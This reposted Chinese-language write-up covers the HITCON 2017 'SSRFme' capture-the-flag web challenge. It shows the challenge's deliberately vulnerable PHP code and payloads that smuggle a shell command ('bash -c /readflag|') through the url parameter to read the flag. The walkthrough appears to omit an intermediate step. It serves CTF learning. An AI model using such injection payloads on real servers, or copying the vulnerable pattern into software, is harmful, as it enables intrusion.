BUU-WEB-[HITCON 2017]SSRFme
Posted TzZzEZ-web
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[HITCON 2017]SSRFme相关的知识,希望对你有一定的参考价值。
[HITCON 2017]SSRFme
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
}
echo $_SERVER["REMOTE_ADDR"];
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);
@chdir($sandbox);
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
highlight_file(__FILE__);
?>
第一个if函数得到本机的ip,然后与orange一起进行md5加密。
通过url参数输入的内容会以GET命令执行,执行的结果保存到filename参数的值命名的文件里。
尝试读取根目录,将结果保存进test文件中。
构建payload:
/?url=/&filename=test
test保存在sandbox/下,然后将orange和主机ip进行32位md5加密。
可以看出下一步是读取readflag。
直接读取/readflag是不可以的,这样会将文件创建至根目录底下,而不是相对于所存页面的相对根目录。所以通过bash -c /readflag达到一个./readflag的作用。
构建payload:
?url=file:bash -c /readflag|&filename=test
访问目标地址,即可得到flag。
以上是关于BUU-WEB-[HITCON 2017]SSRFme的主要内容,如果未能解决你的问题,请参考以下文章